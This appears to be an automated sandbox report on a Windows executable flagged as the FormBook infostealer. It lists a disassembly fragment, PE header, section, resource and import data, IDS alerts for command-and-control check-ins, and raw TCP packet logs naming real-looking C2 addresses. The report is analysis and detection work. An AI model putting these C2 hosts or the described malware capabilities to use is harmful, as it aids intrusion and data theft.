                                                                                                                                                                            and edi, 0Fh
                                                                                                                                                                            and esi, 0Fh
                                                                                                                                                                            cmp edi, esi
                                                                                                                                                                            pop esi
                                                                                                                                                                            pop edi
                                                                                                                                                                            jne 00007EFED8C6EDB7h
                                                                                                                                                                            jmp 00007EFED8C6F192h
                                                                                                                                                                            test edi, 00000003h
                                                                                                                                                                            jne 00007EFED8C6EDC6h
                                                                                                                                                                            shr ecx, 02h
                                                                                                                                                                            and edx, 03h
                                                                                                                                                                            cmp ecx, 08h
                                                                                                                                                                            jc 00007EFED8C6EDDBh
                                                                                                                                                                            rep movsd
                                                                                                                                                                            jmp dword ptr [00416740h+edx*4]
                                                                                                                                                                            mov eax, edi
                                                                                                                                                                            mov edx, 00000003h
                                                                                                                                                                            sub ecx, 04h
                                                                                                                                                                            jc 00007EFED8C6EDBEh
                                                                                                                                                                            and eax, 03h
                                                                                                                                                                            add ecx, eax
                                                                                                                                                                            jmp dword ptr [00416654h+eax*4]
                                                                                                                                                                            jmp dword ptr [00416750h+ecx*4]
                                                                                                                                                                            nop
                                                                                                                                                                            jmp dword ptr [004166D4h+ecx*4]
                                                                                                                                                                            nop
                                                                                                                                                                            inc cx
                                                                                                                                                                            add byte ptr [eax-4BFFBE9Ah], dl
                                                                                                                                                                            inc cx
                                                                                                                                                                            add byte ptr [ebx], ah
                                                                                                                                                                            ror dword ptr [edx-75F877FAh], 1
                                                                                                                                                                            inc esi
                                                                                                                                                                            add dword ptr [eax+468A0147h], ecx
                                                                                                                                                                            add al, cl
                                                                                                                                                                            jmp 00007EFEDB0E75B7h
                                                                                                                                                                            add esi, 03h
                                                                                                                                                                            add edi, 03h
                                                                                                                                                                            cmp ecx, 08h
                                                                                                                                                                            jc 00007EFED8C6ED7Eh
                                                                                                                                                                            rep movsd
                                                                                                                                                                            jmp dword ptr [00000000h+edx*4]

                                                                                                                                                                            Rich Headers

                                                                                                                                                                            Programming Language:
                                                                                                                                                                            • [ C ] VS2010 SP1 build 40219
                                                                                                                                                                            • [C++] VS2010 SP1 build 40219
                                                                                                                                                                            • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                            • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                            • [ASM] VS2010 SP1 build 40219
                                                                                                                                                                            • [RES] VS2010 SP1 build 40219
                                                                                                                                                                            • [LNK] VS2010 SP1 build 40219

                                                                                                                                                                            Data Directories

                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9328.rsrc
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                            Sections

                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                            .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                            .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                            .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                            .rsrc0xab0000x93280x9400495451d7eb8326bd9fa2714869ea6de8False0.49002322635135137data5.541804843154628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                            Resources

                                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                            RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                                                                                            RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                                                                                            RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                                                                                            RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                                                                                                                                                                            RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                                                                                                                                                                            RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                                                                                                                                                                            RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                                                                                                                                                                            RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                                                                                                                                                                            RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                                                                                                                                                                            RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                                                                                                                                                                            RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                                                                                                                                                                            RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                                                                                                                                                                            RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                                                                                                                                                                            RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                                                                                                                                                                            RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                                                                                                                                                                            RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                                                                                                                                                                            RT_STRING0xb28380x4d0dataEnglishGreat Britain0.36363636363636365
                                                                                                                                                                            RT_STRING0xb2d080x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                                                                                            RT_STRING0xb33080x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                                                                                            RT_STRING0xb39680x388dataEnglishGreat Britain0.377212389380531
                                                                                                                                                                            RT_STRING0xb3cf00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                                                                                                                                            RT_GROUP_ICON0xb3e480x84dataEnglishGreat Britain0.6439393939393939
                                                                                                                                                                            RT_GROUP_ICON0xb3ed00x14dataEnglishGreat Britain1.15
                                                                                                                                                                            RT_GROUP_ICON0xb3ee80x14dataEnglishGreat Britain1.25
                                                                                                                                                                            RT_GROUP_ICON0xb3f000x14dataEnglishGreat Britain1.25
                                                                                                                                                                            RT_VERSION0xb3f180x19cdataEnglishGreat Britain0.5339805825242718
                                                                                                                                                                            RT_MANIFEST0xb40b80x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581

                                                                                                                                                                            Imports

                                                                                                                                                                            DLLImport
                                                                                                                                                                            WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                                                                                                                                            VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                                                                                                                                            WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                                                                            COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                                                                                                                                            MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                                                                                                                                            WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                                                                                                                                            PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                                                                                                                                            USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                                                                                                                                            KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                                                                                                                                                                            USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                                                                                                                                                                            GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                                                                                                                                                                            COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                                                                                            ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                                                                                                                                                                            SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                                                                                            ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                                                                                                                                                                            OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit

                                                                                                                                                                            Possible Origin

                                                                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                            EnglishGreat Britain
                                                                                                                                                                            EnglishUnited States

                                                                                                                                                                            Network Behavior

                                                                                                                                                                            Suricata IDS Alerts

                                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                            2024-09-27T17:29:46.279961+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.56368865.21.196.9080TCP
                                                                                                                                                                            2024-09-27T17:30:19.046227+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5636923.33.130.19080TCP
                                                                                                                                                                            2024-09-27T17:30:21.408275+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5636933.33.130.19080TCP
                                                                                                                                                                            2024-09-27T17:30:23.081891+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5636943.33.130.19080TCP
                                                                                                                                                                            2024-09-27T17:30:26.054926+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.5636953.33.130.19080TCP
                                                                                                                                                                            2024-09-27T17:30:32.493925+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.56369638.47.233.1980TCP
                                                                                                                                                                            2024-09-27T17:30:35.077130+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.56369938.47.233.1980TCP
                                                                                                                                                                            2024-09-27T17:30:37.596530+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.56370038.47.233.1980TCP
                                                                                                                                                                            2024-09-27T17:30:40.119661+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.56370138.47.233.1980TCP
                                                                                                                                                                            2024-09-27T17:30:46.412025+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.563702172.67.165.2580TCP
                                                                                                                                                                            2024-09-27T17:30:49.024299+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.563703172.67.165.2580TCP
                                                                                                                                                                            2024-09-27T17:30:51.502507+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.563704172.67.165.2580TCP
                                                                                                                                                                            2024-09-27T17:30:54.071710+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.563705172.67.165.2580TCP
                                                                                                                                                                            2024-09-27T17:30:59.952747+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.563706208.91.197.2780TCP
                                                                                                                                                                            2024-09-27T17:31:02.507416+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.563707208.91.197.2780TCP
                                                                                                                                                                            2024-09-27T17:31:05.060861+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.563708208.91.197.2780TCP
                                                                                                                                                                            2024-09-27T17:31:09.486959+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.563709208.91.197.2780TCP
                                                                                                                                                                            2024-09-27T17:31:16.579307+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.563711162.0.238.4380TCP
                                                                                                                                                                            2024-09-27T17:31:19.255760+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.563712162.0.238.4380TCP
                                                                                                                                                                            2024-09-27T17:31:21.684344+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.563713162.0.238.4380TCP
                                                                                                                                                                            2024-09-27T17:31:24.344519+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.563714162.0.238.4380TCP
                                                                                                                                                                            2024-09-27T17:31:29.887845+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5637153.33.130.19080TCP
                                                                                                                                                                            2024-09-27T17:31:33.455688+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5637163.33.130.19080TCP
                                                                                                                                                                            2024-09-27T17:31:33.455688+02002856318ETPRO MALWARE FormBook CnC Checkin (POST) M41192.168.2.5637163.33.130.19080TCP
                                                                                                                                                                            2024-09-27T17:31:35.999476+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5637173.33.130.19080TCP
                                                                                                                                                                            2024-09-27T17:31:37.480561+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.5637183.33.130.19080TCP
                                                                                                                                                                            2024-09-27T17:31:44.108829+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.56371985.159.66.9380TCP
                                                                                                                                                                            2024-09-27T17:31:46.655732+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.56372085.159.66.9380TCP
                                                                                                                                                                            2024-09-27T17:31:49.202624+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.56372185.159.66.9380TCP
                                                                                                                                                                            2024-09-27T17:31:50.930043+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.56372285.159.66.9380TCP
                                                                                                                                                                            2024-09-27T17:31:57.288710+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.563723160.251.148.2080TCP
                                                                                                                                                                            2024-09-27T17:31:59.824590+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.563725160.251.148.2080TCP
                                                                                                                                                                            2024-09-27T17:32:02.545176+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.563726160.251.148.2080TCP
                                                                                                                                                                            2024-09-27T17:32:04.945053+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.563727160.251.148.2080TCP
                                                                                                                                                                            2024-09-27T17:32:10.965892+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.563728208.91.197.3980TCP
                                                                                                                                                                            2024-09-27T17:32:13.559112+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.563729208.91.197.3980TCP
                                                                                                                                                                            2024-09-27T17:32:16.103969+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.563730208.91.197.3980TCP
                                                                                                                                                                            2024-09-27T17:32:19.335928+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.563731208.91.197.3980TCP

                                                                                                                                                                            Network Port Distribution

                                                                                                                                                                            TCP Packets

                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                            Sep 27, 2024 17:29:45.578249931 CEST6368880192.168.2.565.21.196.90
                                                                                                                                                                            Sep 27, 2024 17:29:45.583000898 CEST806368865.21.196.90192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:29:45.583095074 CEST6368880192.168.2.565.21.196.90
                                                                                                                                                                            Sep 27, 2024 17:29:45.589664936 CEST6368880192.168.2.565.21.196.90
                                                                                                                                                                            Sep 27, 2024 17:29:45.594542980 CEST806368865.21.196.90192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:29:46.279315948 CEST806368865.21.196.90192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:29:46.279906034 CEST806368865.21.196.90192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:29:46.279961109 CEST6368880192.168.2.565.21.196.90
                                                                                                                                                                            Sep 27, 2024 17:29:46.282946110 CEST6368880192.168.2.565.21.196.90
                                                                                                                                                                            Sep 27, 2024 17:29:46.287739038 CEST806368865.21.196.90192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:17.509922981 CEST6369280192.168.2.53.33.130.190
                                                                                                                                                                            Sep 27, 2024 17:30:17.515252113 CEST80636923.33.130.190192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:17.515376091 CEST6369280192.168.2.53.33.130.190
                                                                                                                                                                            Sep 27, 2024 17:30:17.533838987 CEST6369280192.168.2.53.33.130.190
                                                                                                                                                                            Sep 27, 2024 17:30:17.538691998 CEST80636923.33.130.190192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:19.046226978 CEST6369280192.168.2.53.33.130.190
                                                                                                                                                                            Sep 27, 2024 17:30:19.100147009 CEST80636923.33.130.190192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:20.064881086 CEST6369380192.168.2.53.33.130.190
                                                                                                                                                                            Sep 27, 2024 17:30:20.069824934 CEST80636933.33.130.190192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:20.073498011 CEST6369380192.168.2.53.33.130.190
                                                                                                                                                                            Sep 27, 2024 17:30:20.085330009 CEST6369380192.168.2.53.33.130.190
                                                                                                                                                                            Sep 27, 2024 17:30:20.090691090 CEST80636933.33.130.190192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:21.408143044 CEST80636933.33.130.190192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:21.408274889 CEST6369380192.168.2.53.33.130.190
                                                                                                                                                                            Sep 27, 2024 17:30:21.408416986 CEST80636933.33.130.190192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:21.408461094 CEST6369380192.168.2.53.33.130.190
                                                                                                                                                                            Sep 27, 2024 17:30:21.408623934 CEST80636923.33.130.190192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:21.408726931 CEST6369280192.168.2.53.33.130.190
                                                                                                                                                                            Sep 27, 2024 17:30:21.408755064 CEST80636933.33.130.190192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:21.408797026 CEST6369380192.168.2.53.33.130.190
                                                                                                                                                                            Sep 27, 2024 17:30:21.408876896 CEST80636923.33.130.190192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:21.409111023 CEST6369280192.168.2.53.33.130.190
                                                                                                                                                                            Sep 27, 2024 17:30:21.409398079 CEST80636923.33.130.190192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:21.409456968 CEST6369280192.168.2.53.33.130.190
                                                                                                                                                                            Sep 27, 2024 17:30:21.413928032 CEST80636923.33.130.190192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:21.414402008 CEST80636923.33.130.190192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:21.593074083 CEST6369380192.168.2.53.33.130.190
                                                                                                                                                                            Sep 27, 2024 17:30:21.598141909 CEST80636933.33.130.190192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:22.611567974 CEST6369480192.168.2.53.33.130.190
                                                                                                                                                                            Sep 27, 2024 17:30:22.616647005 CEST80636943.33.130.190192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:22.616832018 CEST6369480192.168.2.53.33.130.190
                                                                                                                                                                            Sep 27, 2024 17:30:22.628164053 CEST6369480192.168.2.53.33.130.190
                                                                                                                                                                            Sep 27, 2024 17:30:22.633780956 CEST80636943.33.130.190192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:22.635179996 CEST80636943.33.130.190192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:23.081831932 CEST80636943.33.130.190192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:23.081891060 CEST6369480192.168.2.53.33.130.190
                                                                                                                                                                            Sep 27, 2024 17:30:24.139954090 CEST6369480192.168.2.53.33.130.190
                                                                                                                                                                            Sep 27, 2024 17:30:24.144892931 CEST80636943.33.130.190192.168.2.5
                                                                                                                                                                            Sep 27, 2024 17:30:25.158898115 CEST6369580192.168.2.53.33.130.190
                                                                                                                                                                            Sep 27, 2024 17:30:25.594643116 CEST80636953.33.130.190192.168.2.5
